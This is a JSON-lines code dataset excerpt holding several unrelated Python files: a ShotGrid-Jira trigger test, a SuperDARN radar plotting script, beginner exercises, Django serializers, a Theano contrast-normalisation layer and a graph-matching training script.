\"\"\"\n Mock requests.post made the trigger and return a Response with the url\n and the payload.\n \"\"\"\n response = requests.Response()\n response.url = args[0]\n response._contents = kwargs\n response.status_code = 200\n return response\n\n\nclass TestSGTrigger(TestBase):\n \"\"\"\n Tests related to the ShotGrid Event trigger.\n \"\"\"\n\n def setUp(self):\n logging.basicConfig(format=\"%(levelname)s:%(name)s:%(message)s\")\n\n def test_project_sync_url_base_schema(self):\n \"\"\"\n Check nothing bad happens if a Project can't be found or if some\n needed fields are missing in the schema\n \"\"\"\n self.set_sg_mock_schema(\n os.path.join(os.path.dirname(__file__), \"fixtures\", \"schemas\", \"base\",)\n )\n shotgun = mockgun.Shotgun(\"http://unit_test_mock_sg\", \"mock_user\", \"mock_key\")\n # Check nothing bad happens if a Project can't be found or if some\n # needed fields are missing in the schema\n routing = {}\n sg_jira_event_trigger.process_event(shotgun, logger, EVENT, routing)\n # Add missing project\n self.add_to_sg_mock_db(shotgun, PROJECT)\n 
sg_jira_event_trigger.process_event(shotgun, logger, EVENT, routing)\n self.assertTrue(PROJECT[\"id\"] in routing)\n\n @mock.patch(\"requests.post\", side_effect=mocked_requests_post)\n def test_project_sync_url(self, mocked):\n \"\"\"\n Test retrieving the dispatch url for a Project.\n \"\"\"\n routing = {}\n # Switch to a schema with needed fields\n self.set_sg_mock_schema(\n os.path.join(os.path.dirname(__file__), \"fixtures\", \"schemas\", \"sg-jira\",)\n )\n shotgun = mockgun.Shotgun(\"http://unit_test_mock_sg\", \"mock_user\", \"mock_key\")\n self.add_to_sg_mock_db(shotgun, PROJECT)\n sg_jira_event_trigger.process_event(shotgun, logger, EVENT, routing)\n self.assertTrue(PROJECT[\"id\"] in routing)\n self.assertIsNone(routing[PROJECT[\"id\"]])\n routing = {}\n url = \"http://localhost/default/sg2jira\"\n shotgun.update(\n PROJECT[\"type\"],\n PROJECT[\"id\"],\n data={\n \"sg_jira_sync_url\": {\n \"content_type\": \"string\",\n \"link_type\": \"web\",\n \"name\": \"test\",\n \"url\": \"http://localhost/default/sg2jira\",\n }\n },\n )\n sg_jira_event_trigger.process_event(shotgun, logger, EVENT, routing)\n self.assertTrue(PROJECT[\"id\"] in routing)\n self.assertTrue(routing[PROJECT[\"id\"]].startswith(url))\n # The first sync for a Project also resets the bridge so it\n # generates 2 calls.\n self.assertEqual(mocked.call_count, 2)\n self.assertTrue(mocked.call_args[0][0].startswith(url))\n # Check the trigger clears its routing cache if the sync url is changed\n project_event = {\n \"event_type\": \"Shotgun_Project_Change\",\n \"entity\": PROJECT,\n \"project\": None,\n \"attribute_name\": \"sg_jira_sync_url\",\n \"meta\": {\n \"type\": \"attribute_change\",\n \"attribute_name\": \"sg_jira_sync_url\",\n \"entity_type\": PROJECT[\"type\"],\n \"entity_id\": PROJECT[\"id\"],\n \"field_data_type\": \"url\",\n \"old_value\": None,\n \"new_value\": {\n \"attachment_id\": 1416,\n \"attachment_type\": \"http_url\",\n \"display_name\": \"Jira Sync\",\n \"icon_url\": \"/images/filetypes/filetype_icon_misc.png\",\n \"icon_class\": \"icon_web\",\n \"url\": \"http://localhost/default/sg2jira\",\n \"attachment_uuid\": \"abcdefg\",\n },\n },\n }\n sg_jira_event_trigger.process_event(shotgun, logger, project_event, routing)\n self.assertFalse(PROJECT[\"id\"] in routing)\n # Processing the Task event should cache the routing again\n sg_jira_event_trigger.process_event(shotgun, logger, EVENT, routing)\n self.assertTrue(PROJECT[\"id\"] in routing)\n self.assertTrue(routing[PROJECT[\"id\"]].startswith(url))\n mocked.assert_called()\n self.assertTrue(mocked.call_args[0][0].startswith(url))\n","repo_name":"shotgunsoftware/sg-jira-bridge","sub_path":"tests/test_sg_trigger.py","file_name":"test_sg_trigger.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"60"} +{"seq_id":"1787148864","text":"import bz2\nimport pathlib\n\nimport pandas as pd\nimport pydarn\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom scipy import stats\n\nfrom lib.elevation_v2 import elevation_v2\nfrom DataAnalysis.EchoOccurrence.lib.add_decimal_hour_to_df import add_decimal_hour_to_df\n\n\ndef range_time_profiler(df, gate_range, hour_range, param, zlimits, time_units='ut'):\n \"\"\"\n\n A simple range time profiler for a single parameter.\n\n :param df: pandas.DataFrame:\n A SuperDARN fit dataframe.\n :param gate_range: (int, int):\n The gate range to profile (y-axis limits)\n :param hour_range: (float, float):\n The hour range to 
profile (x-axis limits)\n :param param: str:\n The fit parameter to range-time profile\n :param zlimits: (float, float):\n The z limits. For example, for param='vel' this is usually (-600, 600).\n\n :param time_units: str (optional; default is 'ut')\n The time units to use.\n 'ut' for universal time\n 'mlt' for magnetic local time\n 'lt' for local time (based on longitude)\n 'lst' for local standard time (based on time zones)\n 'ast' for apparent solar time (based on the apparent angular motion of the sun across the sky)\n\n :return fig: matplotlib.pyplot.figure:\n\n \"\"\"\n\n if len(df) <= 0:\n raise Exception(\"range_time_profiler(): Empty dataframe.\")\n\n # Add UT decimal hour to df\n station = df['station'].iat[0]\n df = add_decimal_hour_to_df(df=df, time_units=time_units, stid=pydarn.read_hdw_file(station).stid,\n date_time_est=df['datetime'].iat[0])\n df = df.loc[(df[time_units] > hour_range[0]) & (df[time_units] < hour_range[1]) &\n (df['gate'] > gate_range[0]) & (df['gate'] < gate_range[1])]\n\n # Compute hour edges\n bins_per_hour = 60\n n_bins_x = int((hour_range[1] - hour_range[0]) * bins_per_hour)\n hour_edges = np.linspace(hour_range[0], hour_range[1], num=(n_bins_x + 1))\n\n # Compute gate_edges\n bins_per_gate = 1\n n_bins_y = int(((gate_range[1] + 1) - gate_range[0]) * bins_per_gate)\n gate_edges = np.linspace(gate_range[0], gate_range[1] + 1, num=(n_bins_y + 1), dtype=int)\n\n result, _, _, _ = stats.binned_statistic_2d(df[time_units], df['gate'], values=df[param],\n bins=[hour_edges, gate_edges])\n\n fig, ax = plt.subplots(figsize=(8, 4), dpi=300, constrained_layout=True, nrows=1, ncols=1)\n ax.set_xlabel(\"Hour [\" + time_units.upper() + \"]\")\n ax.set_ylabel(\"Range Gate\")\n ax.set_title(\"Parameter: \" + param)\n plot = ax.pcolormesh(hour_edges, gate_edges, result.transpose(), cmap='jet', vmin=zlimits[0], vmax=zlimits[1],\n zorder=0)\n\n cbar_text_format = '%d'\n if param == 'vel':\n cbar = fig.colorbar(plot, ax=ax, orientation=\"vertical\", format=cbar_text_format, extend='both')\n else:\n cbar = fig.colorbar(plot, ax=ax, orientation=\"vertical\", format=cbar_text_format, extend='max')\n\n return fig\n\n\nif __name__ == \"__main__\":\n \"\"\" \"\"\"\n\n station = \"hok\"\n year = \"2014\"\n month = \"02\"\n day = \"23\"\n\n param = 'adjPhase'\n zlimits = (-24, -16)\n\n # param = 'adjElv'\n # zlimits = (0, 40)\n\n t_diff = 0 # in nanoseconds\n gate_range = (0, 74)\n hour_range = (6, 12)\n beam = 7\n\n time_units = 'ut'\n start_hour = 6\n end_hour = 12\n\n # Read in SuperDARN data\n loc_root = str(((pathlib.Path().parent.absolute()).parent.absolute()))\n in_dir = loc_root + \"/DataAnalysis/DataReading/SD/data/\" + station + \"/\" + station + year + month + day\n in_file = in_dir + \"/\" + station + year + month + day + \".pbz2\"\n data_stream = bz2.BZ2File(in_file, \"rb\")\n df = pd.read_pickle(data_stream)\n\n df = df.loc[df['bmnum'] == beam]\n df.reset_index(drop=True, inplace=True)\n\n\n print(\"Recomputing elevation angles...\")\n elevation_v2(df=df, t_diff=t_diff / 1000)\n\n # print(df[['phase', 'adjPhase', 'adjElv']])\n # print(\"Adjusted phase max: \" + str(np.max(df['adjPhase'])))\n # print(\"Adjusted phase min: \" + str(np.min(df['adjPhase'])))\n\n fig = range_time_profiler(df=df, gate_range=gate_range, hour_range=hour_range, param=param, zlimits=zlimits,\n time_units='ut')\n plt.show()\n\n # Save the figure to file\n loc_root = str(pathlib.Path().parent.absolute())\n out_dir = loc_root + \"/out\"\n out_fig = out_dir + \"/rt_profile_\" + station + year + 
month + day + \"_\" + param + \"_tdiff_\" + str(t_diff) + \"ns\"\n print(\"Saving plot as \" + out_fig)\n fig.savefig(out_fig + \".jpg\", format='jpg', dpi=300)\n","repo_name":"mrl280/Summer2021PythonWork","sub_path":"lib/range_time_profiler.py","file_name":"range_time_profiler.py","file_ext":"py","file_size_in_byte":4675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40603628125","text":"def my_sum(*args):\n if all ([(type(arg) == int or type(args) == float) for arg in args ]):\n total = 0\n for i in args:\n total += i\n return total\n else:\n return \"Wrong number\"\n\nprint (my_sum(2,4,6,8,10))\nprint (my_sum(2,4,6,8,10,'hershit'))","repo_name":"SachinPitale/Python3","sub_path":"Python-2020/Chapter_13/7.any_all_function_1.py","file_name":"7.any_all_function_1.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35925379253","text":"\"\"\"\r\n1.\r\n\"\"\"\r\n\r\nimport random\r\n\r\n#******************************\r\ndef ckeck_wrong_position():\r\n global wrong_position\r\n\r\n flag = 0\r\n rowWK = white_king // stiles\r\n colWK = white_king % stiles\r\n \r\n L=[]\r\n if rowWK - 1 >= 0:\r\n L.append([rowWK-1,colWK])\r\n if colWK - 1 >=0:\r\n L.append([rowWK-1,colWK-1])\r\n if colWK + 1 < 8 :\r\n L.append([rowWK-1,colWK+1])\r\n\r\n if colWK - 1 >=0:\r\n L.append([rowWK,colWK-1])\r\n if colWK + 1 < 8 : \r\n L.append([rowWK,colWK+1])\r\n\r\n if rowWK + 1 <8:\r\n L.append([rowWK+1,colWK])\r\n if colWK - 1 >=0:\r\n L.append([rowWK+1,colWK-1])\r\n if colWK + 1 < 8 :\r\n L.append([rowWK+1,colWK+1])\r\n\r\n i=0\r\n while i < len(L):\r\n if board[L[i][0]][L[i][1]] == \"BK\":\r\n flag = 1\r\n wrong_position += 1\r\n i=len(L)\r\n # for row in range(grames):\r\n # print(board[row])\r\n # print()\r\n\r\n i+=1\r\n\r\n\r\n return flag\r\n#******************************\r\n\r\n#******************************\r\ndef check_danger():\r\n global danger\r\n\r\n flag_danger = 0\r\n rowWQ = white_queen // stiles\r\n colWQ = white_queen % stiles\r\n\r\n start_row = rowWQ\r\n start_col = colWQ\r\n\r\n rowBK = black_king // stiles\r\n colBK = black_king % stiles\r\n\r\n # horizontal or vertical\r\n if (rowBK == rowWQ) or (colBK == colWQ):\r\n flag_danger = 1\r\n\r\n \r\n # diagonal 1\r\n start_row = rowWQ\r\n start_col = colWQ\r\n if flag_danger == 0:\r\n if colWQ == 0:\r\n start_row = rowWQ\r\n start_col = colWQ\r\n else:\r\n flag1 = 1\r\n while flag1:\r\n if start_row - 1 >= 0 and start_col - 1 >= 0:\r\n start_row -= 1\r\n start_col -= 1\r\n else:\r\n flag1 = 0\r\n\r\n\r\n flag1 = 1\r\n while flag1:\r\n if (start_row == rowBK) and (start_col == colBK):\r\n flag_danger = 1\r\n flag1 = 0\r\n else:\r\n start_row += 1\r\n start_col += 1 \r\n if start_row > 7 or start_col > 7:\r\n flag1 = 0\r\n\r\n # diagonal 2\r\n start_row = rowWQ\r\n start_col = colWQ\r\n if flag_danger == 0:\r\n if rowWQ == 0:\r\n start_row = rowWQ\r\n start_col = colWQ\r\n else:\r\n flag1 = 1\r\n while flag1:\r\n if start_row - 1 >= 0 and start_col + 1 <= 7:\r\n start_row -= 1\r\n start_col += 1\r\n else:\r\n flag1 = 0\r\n\r\n flag1 = 1\r\n while flag1:\r\n if (start_row == rowBK) and (start_col == colBK):\r\n flag_danger = 1\r\n flag1 = 0\r\n else:\r\n start_row += 1\r\n start_col -= 1 \r\n if start_row > 7 or start_col < 0:\r\n flag1 = 0\r\n \r\n if flag_danger == 1:\r\n danger += 1\r\n # for row in range(grames):\r\n # print(board[row])\r\n # print()\r\n\r\n\r\n return 
\r\n#******************************\r\n\r\ndanger = 0 \r\nwrong_position = 0\r\n\r\nstiles = 8\r\ngrames = stiles\r\nflag = 0\r\n\r\n\r\nfor times in range(100):\r\n\r\n board = [] # skakiera\r\n\r\n theseis = (grames * stiles)\r\n \r\n for i in range(grames):\r\n L1 = []\r\n for j in range(stiles):\r\n L1.append(\"00\")\r\n board.append(L1)\r\n\r\n white_queen = random.randint(0,theseis-1)\r\n row = white_queen // stiles\r\n col = white_queen % stiles\r\n board[row][col] = \"WQ\" \r\n\r\n i=1\r\n while i :\r\n white_king = random.randint(0,theseis-1)\r\n row = white_king // stiles\r\n col = white_king % stiles\r\n if board[row][col] == \"00\":\r\n board[row][col] = \"WK\"\r\n i=0\r\n\r\n i=1\r\n while i :\r\n black_king = random.randint(0,theseis-1)\r\n row = black_king // stiles\r\n col = black_king % stiles\r\n if board[row][col] == \"00\":\r\n board[row][col] = \"BK\"\r\n i=0 \r\n \r\n \r\n # for row in range(grames):\r\n # print(board[row])\r\n # print()\r\n \r\n\r\n flag = ckeck_wrong_position()\r\n if flag == 0:\r\n check_danger()\r\n\r\n\r\nprint( 'σε απειλή : ', danger ) \r\nprint( 'σε λάθος θέση : ', wrong_position ) \r\n","repo_name":"GabrielAbdo/P20248","sub_path":"exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"40480942581","text":"from rest_framework import serializers\nfrom ..appointment.models import Appointment\nfrom ..users.models import Doctor, User\n\n\nclass AppointmentDetailSerializer(serializers.HyperlinkedModelSerializer):\n doctor = serializers.PrimaryKeyRelatedField(queryset=Doctor.objects.all())\n class Meta:\n model = Appointment\n fields = ['email', 'status', 'date', 'time', 'doctor', 'comments']\n extra_kwargs = {\n 'status': {\n 'read_only': True\n }\n }\n\n def create(self, validated_data):\n if not User.objects.filter(email=validated_data['email']).exists():\n email = validated_data['email']\n user_data = {}\n user_data['email'] = email\n user_data['username'] = email\n user_data['first_name'] = email\n user_data['last_name'] = email\n user_data['is_patient'] = True\n User.objects.create(**user_data)\n return Appointment.objects.create(**validated_data)\n\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = User\n fields = ('first_name', 'last_name', 'email', 'username',)\n\n\nclass DoctorSerializer(serializers.ModelSerializer):\n user = UserSerializer()\n\n class Meta:\n model = Doctor\n fields = ('user', 'pk')\n\n def create(self, validated_data):\n user = User.objects.create(**validated_data['user'])\n return Doctor.objects.create(user=user)\n","repo_name":"vanegg/app_pediatricians","sub_path":"yema/apps/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18515258114","text":"import theano\nimport theano.tensor as T\nimport numpy\nfrom theano.tensor.nnet import conv\n#import pylab\n# source : https://github.com/jostosh/theano_utils/blob/master/lcn.py\n\nclass LecunLCN(object):\n def __init__(self, X, image_shape, threshold=1e-4, radius=9, use_divisor=True):\n \"\"\"\n Allocate an LCN.\n\n :type X: theano.tensor.dtensor4\n :param X: symbolic image tensor, of shape image_shape\n\n :type image_shape: tuple or list of length 4\n :param image_shape: (batch size, num input feature maps,\n image height, image width)\n :type threshold: 
double\n :param threshold: the threshold will be used to avoid division by zeros\n\n :type radius: int\n :param radius: determines size of Gaussian filter patch (default 9x9)\n\n :type use_divisor: Boolean\n :param use_divisor: whether or not to apply divisive normalization\n \"\"\"\n\n # Get Gaussian filter\n filter_shape = (1, image_shape[1], radius, radius)\n\n self.filters = theano.shared(self.gaussian_filter(filter_shape), borrow=True)\n\n # Compute the Guassian weighted average by means of convolution\n convout = conv.conv2d(\n input=X,\n filters=self.filters,\n image_shape=image_shape,\n filter_shape=filter_shape,\n border_mode='full'\n )\n\n # Subtractive step\n mid = int(numpy.floor(filter_shape[2] / 2.))\n\n # Make filter dimension broadcastable and subtract\n centered_X = X - T.addbroadcast(convout[:, :, mid:-mid, mid:-mid], 1)\n\n # Boolean marks whether or not to perform divisive step\n if use_divisor:\n # Note that the local variances can be computed by using the centered_X\n # tensor. If we convolve this with the mean filter, that should give us\n # the variance at each point. We simply take the square root to get our\n # denominator\n\n # Compute variances\n sum_sqr_XX = conv.conv2d(\n input=T.sqr(centered_X),\n filters=self.filters,\n image_shape=image_shape,\n filter_shape=filter_shape,\n border_mode='full'\n )\n\n\n # Take square root to get local standard deviation\n denom = T.sqrt(sum_sqr_XX[:,:,mid:-mid,mid:-mid])\n\n per_img_mean = denom.mean(axis=[2,3])\n divisor = T.largest(per_img_mean.dimshuffle(0, 1, 'x', 'x'), denom)\n # Divisise step\n new_X = centered_X / T.maximum(T.addbroadcast(divisor, 1), threshold)\n else:\n new_X = centered_X\n\n self.output = new_X\n\n\n def gaussian_filter(self, kernel_shape):\n x = numpy.zeros(kernel_shape, dtype=theano.config.floatX)\n\n def gauss(x, y, sigma=2.0):\n Z = 2 * numpy.pi * sigma ** 2\n return 1. / Z * numpy.exp(-(x ** 2 + y ** 2) / (2. 
* sigma ** 2))\n\n mid = numpy.floor(kernel_shape[-1] / 2.)\n for kernel_idx in xrange(0, kernel_shape[1]):\n for i in xrange(0, kernel_shape[2]):\n for j in xrange(0, kernel_shape[3]):\n x[0, kernel_idx, i, j] = gauss(i - mid, j - mid)\n\n return x / numpy.sum(x)\n\ndef lcn_function(radius=13):\n\tX = T.tensor4('x')\n\top = LecunLCN(X=X, image_shape=(1,1,32,32), radius=radius)\n\tf = theano.function([X], op.output, allow_input_downcast=True)\n\treturn f\n\nif __name__==\"__main__\":\n\tf = lcn() # TO BE TESTED\n\tx_value = numpy.random.ranf((1, 1, 32, 32))\n\ty_value = f(x_value)\n\timport pdb\n\tpdb.set_trace()\n","repo_name":"mducoffe/Active_Learning_Variational_Inference_Deep_Networks","sub_path":"old_version/lcn.py","file_name":"lcn.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"28204385136","text":"from __future__ import division\r\nfrom __future__ import print_function\r\nfrom platform import node\r\n\r\nimport time\r\nimport argparse\r\nimport numpy as np\r\n\r\nimport torch\r\nimport torch.optim as optim\r\nfrom torch.autograd import Variable\r\nimport itertools\r\n\r\nfrom utils import load_data\r\nfrom models import *\r\nfrom os import mkdir\r\nfrom os.path import exists\r\n\r\n# from tqdm import tqdm\r\nfrom sklearn.metrics import f1_score, precision_score, accuracy_score, recall_score\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--data_name', type=str, default='nci',\r\n help='data_name, nci, pubchem, fda.')\r\nparser.add_argument('--no-cuda', action='store_true', default=False,\r\n help='Disables CUDA training.')\r\nparser.add_argument('--recon', action='store_true', default=True,\r\n help='Enable recon.')\r\nparser.add_argument('--seed', type=int, default=42, help='Random seed.')\r\nparser.add_argument('--epochs', type=int, default=1500,\r\n help='Number of epochs to train.')\r\nparser.add_argument('--lr', type=float, default=0.0005,\r\n help='Initial learning rate.')\r\nparser.add_argument('--re_lr', type=float, default=0.001,\r\n help='Initial recon learning rate.')\r\nparser.add_argument('--lr_wd', type=float, default=0.01)\r\nparser.add_argument('--predict_th', type=float, default=0.65)\r\nparser.add_argument('--emb_size', type=int, default=400,\r\n help='Number of emb_size to train.')\r\nparser.add_argument('--weight_decay', type=float, default=5e-4,\r\n help='Weight decay (L2 loss on parameters).')\r\nparser.add_argument('--hidden', type=int, default=128,\r\n help='Number of hidden units.')\r\nparser.add_argument('--gcn_out', type=int, default=64,\r\n help='Number of out units.')\r\n# parser.add_argument('--out', type=int, default=32,\r\n# help='Number of out units.')\r\nparser.add_argument('--dropout', type=float, default=0.5,\r\n help='Dropout rate (1 - keep probability).')\r\n\r\ndef w_loss(q_nodes_features, d_nodes_features):\r\n q_nodes_features = q_nodes_features.reshape(q_nodes_features.shape[0]*q_nodes_features.shape[1], q_nodes_features.shape[2])\r\n d_nodes_features = d_nodes_features.reshape(d_nodes_features.shape[0]*d_nodes_features.shape[1], d_nodes_features.shape[2])\r\n for j in range(5):\r\n w0 = wdiscriminator(q_nodes_features)\r\n w1 = wdiscriminator(d_nodes_features)\r\n anchor1 = w1.view(-1).argsort(descending=True)[: d_nodes_features.size(0)]\r\n anchor0 = w0.view(-1).argsort(descending=False)[: d_nodes_features.size(0)]\r\n embd0_anchor = q_nodes_features[anchor0, :].clone().detach()\r\n embd1_anchor = 
d_nodes_features[anchor1, :].clone().detach()\r\n optimizer_wd.zero_grad()\r\n loss = -torch.mean(wdiscriminator(embd0_anchor)) + torch.mean(wdiscriminator(embd1_anchor))\r\n loss.backward()\r\n optimizer_wd.step()\r\n for p in wdiscriminator.parameters():\r\n p.data.clamp_(-0.1, 0.1)\r\n w0 = wdiscriminator(q_nodes_features)\r\n w1 = wdiscriminator(d_nodes_features)\r\n anchor1 = w1.view(-1).argsort(descending=True)[: d_nodes_features.size(0)]\r\n anchor0 = w0.view(-1).argsort(descending=False)[: d_nodes_features.size(0)]\r\n embd0_anchor = q_nodes_features[anchor0, :]\r\n embd1_anchor = d_nodes_features[anchor1, :]\r\n return -torch.mean(wdiscriminator(embd1_anchor))\r\n\r\ndef train(query_num, ground_truth, adjs, total_num, node_max, masks, train_idx_set_list, t_q_num, t_d_num, train_data_idx, train_node_num):\r\n model.train()\r\n extract_model.train()\r\n trans.train()\r\n wdiscriminator.train()\r\n\r\n optimizer.zero_grad()\r\n optimizer_wd.zero_grad()\r\n if(args.recon):\r\n renn_model.train()\r\n renn_optimizer.zero_grad()\r\n \r\n extract_features = extract_model(features) * masks\r\n output = model(extract_features, adjs) * masks\r\n if(args.recon):\r\n recon = renn_model(output) * masks\r\n recon = recon[train_idx_set_list]\r\n output = output.reshape(total_num, node_max, output.shape[-1])\r\n \r\n comp_features = features * masks\r\n comp_features = comp_features[train_idx_set_list]\r\n\r\n q_nodes_features = output[:int(query_num * 0.8)]\r\n d_nodes_features = output[query_num:]\r\n\r\n l_w = w_loss(q_nodes_features, trans(d_nodes_features))\r\n\r\n d_nodes_features = d_nodes_features[train_data_idx]\r\n d_nodes_features = d_nodes_features.reshape(t_q_num , t_d_num, d_nodes_features.shape[1], d_nodes_features.shape[2])\r\n relation = torch.matmul(q_nodes_features.unsqueeze(1), d_nodes_features.permute(0,1,3,2))\r\n relation_sum = relation.sum(dim=-1).sum(dim=-1)\r\n avg_relationt = relation_sum / train_node_num\r\n results = torch.sigmoid(avg_relationt)\r\n predict = torch.where(results > args.predict_th, 1, 0)\r\n l_m = ( - (ground_truth * torch.log(results + 1e-9) + (1 - ground_truth) * torch.log(1 - results + 1e-9))).mean()\r\n if(args.recon):\r\n l_r = torch.norm(recon - comp_features, dim=1, p=2).mean()\r\n loss_train = l_m * 0.9895 + l_r * 0.01 + l_w * 0.0005\r\n else:\r\n loss_train = l_m * 0.999 + l_w * 0.001\r\n loss_train.backward() \r\n optimizer.step()\r\n optimizer_wd.step()\r\n if(args.recon):\r\n renn_optimizer.step()\r\n ground_truth = ground_truth.reshape(ground_truth.shape[0] * ground_truth.shape[1])\r\n predict = predict.reshape(predict.shape[0] * predict.shape[1])\r\n ground_truth = ground_truth.cpu()\r\n predict = predict.cpu()\r\n # print('loss: {:.4f}'.format(loss_train))\r\n # # 'acc:{:.4f}'.format(accuracy_score(ground_truth, predict)),\r\n # # \"pre:{:.4f}\".format(precision_score(ground_truth, predict)),\r\n # # \"F1:{:.4f}\".format(f1_score(ground_truth, predict)),\r\n # # \"recall:{:.4f}\".format(recall_score(ground_truth, predict)))\r\n\r\ndef test(query_num, ground_truth, adjs, total_num, node_max, masks, test_idx_set_list, t_q_num, t_d_num, test_data_idx, test_node_num):\r\n\r\n model.eval()\r\n extract_model.eval()\r\n extract_features = extract_model(features) * masks\r\n output = model(extract_features, adjs) * masks\r\n\r\n output = output.reshape(total_num, node_max, output.shape[-1])\r\n comp_features = features * masks\r\n comp_features = comp_features[test_idx_set_list]\r\n \r\n d_nodes_features = output[query_num:][test_data_idx]\r\n 
q_nodes_features = output[int(query_num * 0.8):query_num].unsqueeze(1)  # presumed fix: test() never defines q_nodes_features and would raise a NameError; the slice and unsqueeze mirror train()\r\n    
d_nodes_features = d_nodes_features.reshape(t_q_num , t_d_num, d_nodes_features.shape[1], d_nodes_features.shape[2]).permute(0,1,3,2)\r\n start_time = time.time()\r\n relation = torch.matmul(q_nodes_features, d_nodes_features).sum(dim=-1).sum(dim=-1) / test_node_num\r\n results = torch.sigmoid(relation)\r\n predict = torch.where(results > args.predict_th, 1, 0)\r\n end_time = time.time()\r\n print(\"Test set results:\",\r\n # \"loss= {:.4f}\".format(loss_test.item()),\r\n \"time:= {:.6f}\".format(end_time - start_time))\r\n ground_truth = ground_truth.reshape(int(ground_truth.shape[0] * ground_truth.shape[1]))\r\n predict = predict.reshape(predict.shape[0] * predict.shape[1])\r\n ground_truth = ground_truth.cpu()\r\n predict = predict.cpu()\r\n print('accuracy:{:.4f}'.format(accuracy_score(ground_truth, predict)))\r\n print(\"prediction:{:.4f}\".format(precision_score(ground_truth, predict)))\r\n print(\"F1-Score:{:.4f}\".format(f1_score(ground_truth, predict)))\r\n print(\"recall-score:{:.4f}\".format(recall_score(ground_truth, predict)))\r\n\r\ndef start_train(query_num, ground_truth, adjs, node_max, masks, train_idx_list, query_node_num, data_node_num):\r\n global features, model, renn_model, extract_model, trans, wdiscriminator\r\n q_idx_list = train_idx_list[:int(query_num*0.8)]\r\n t_idx_list = train_idx_list[int(query_num*0.8):]\r\n train_idx_set_list = torch.LongTensor(list(set(q_idx_list[:,0][:,0].tolist() + (q_idx_list[:,1].reshape(q_idx_list[:,1].shape[0]*q_idx_list[:,1].shape[1])+query_num).tolist())))\r\n test_idx_set_list = torch.LongTensor(list(set(t_idx_list[:,0][:,0].tolist() + (t_idx_list[:,1].reshape(t_idx_list[:,1].shape[0]*t_idx_list[:,1].shape[1])+query_num).tolist())))\r\n if args.cuda:\r\n model.cuda() \r\n extract_model.cuda()\r\n trans.cuda()\r\n wdiscriminator.cuda()\r\n if(args.recon):\r\n renn_model.cuda()\r\n features = features.cuda()\r\n ground_truth, adjs, masks, query_node_num, data_node_num = ground_truth.cuda(), adjs.cuda(), masks.cuda(), query_node_num.cuda(), data_node_num.cuda()\r\n q_idx_list, t_idx_list = q_idx_list.cuda(), t_idx_list.cuda()\r\n train_idx_set_list, test_idx_set_list = train_idx_set_list.cuda(), test_idx_set_list.cuda()\r\n t_q_num = q_idx_list[:,1].shape[0]\r\n t_d_num = q_idx_list[:,1].shape[1]\r\n train_data_idx = q_idx_list[:,1].reshape(t_q_num * t_d_num)\r\n train_query_node_num = query_node_num[:int(query_num*0.8)]\r\n train_data_node_num = data_node_num[train_data_idx].reshape(t_q_num, t_d_num)\r\n train_node_num = train_query_node_num.expand(train_data_node_num.shape[1], train_data_node_num.shape[0]).T * train_data_node_num\r\n total_num = int(features.shape[0] / node_max)\r\n\r\n t_t_q_num = t_idx_list[:,1].shape[0]\r\n t_t_d_num = t_idx_list[:,1].shape[1]\r\n test_data_idx = t_idx_list[:,1].reshape(t_t_q_num * t_t_d_num)\r\n test_query_node_num = query_node_num[int(query_num*0.8):query_num]\r\n test_data_node_num = data_node_num[test_data_idx].reshape(t_t_q_num, t_t_d_num)\r\n test_node_num = test_query_node_num.expand(test_data_node_num.shape[1], test_data_node_num.shape[0]).T * test_data_node_num\r\n \r\n\r\n if(not exists('./model_{}'.format(data_name))):\r\n mkdir('./model_{}'.format(data_name))\r\n # train(query_num, ground_truth[:int(query_num*0.8)], adjs, total_num, node_max, masks, train_idx_set_list, t_q_num, t_d_num, train_data_idx, train_node_num)\r\n if(not exists('./model_{}/{}_main_model.pt'.format(data_name, data_name))):\r\n for epoch in range(1, args.epochs+1):\r\n # print('epoch:{}'.format(epoch))\r\n 
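# each call below performs a single optimisation step over the full training split\r\n            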
train(query_num, ground_truth[:int(query_num*0.8)], adjs, total_num, node_max, masks, train_idx_set_list, t_q_num, t_d_num, train_data_idx, train_node_num)\r\n torch.save(model, './model_{}/{}_main_model.pt'.format(data_name, data_name))\r\n torch.save(model.state_dict(),'./model_{}/{}_main_model_states.pt'.format(data_name, data_name))\r\n torch.save(extract_model, './model_{}/{}_extra_model.pt'.format(data_name, data_name))\r\n torch.save(extract_model.state_dict(),'./model_{}/{}_extra_model_states.pt'.format(data_name, data_name))\r\n torch.save(renn_model, './model_{}/{}_renn_model.pt'.format(data_name, data_name))\r\n torch.save(renn_model.state_dict(),'./model_{}/{}_renn_model_states.pt'.format(data_name, data_name))\r\n torch.save(trans, './model_{}/{}_trans_model.pt'.format(data_name, data_name))\r\n torch.save(trans.state_dict(),'./model_{}/{}_trans_model_states.pt'.format(data_name, data_name))\r\n torch.save(wdiscriminator, './model_{}/{}_wd_model.pt'.format(data_name, data_name))\r\n torch.save(wdiscriminator.state_dict(),'./model_{}/{}_wd_model_states.pt'.format(data_name, data_name))\r\n else:\r\n model.load_state_dict(torch.load('./model_{}/{}_main_model_states.pt'.format(data_name, data_name)))\r\n extract_model.load_state_dict(torch.load('./model_{}/{}_extra_model_states.pt'.format(data_name, data_name)))\r\n renn_model.load_state_dict(torch.load('./model_{}/{}_renn_model_states.pt'.format(data_name, data_name)))\r\n trans.load_state_dict(torch.load('./model_{}/{}_trans_model_states.pt'.format(data_name, data_name)))\r\n wdiscriminator.load_state_dict(torch.load('./model_{}/{}_wd_model_states.pt'.format(data_name, data_name)))\r\n\r\n test(query_num, ground_truth[int(query_num*0.8):], adjs, total_num, node_max, masks, test_idx_set_list, t_t_q_num, t_t_d_num, test_data_idx, 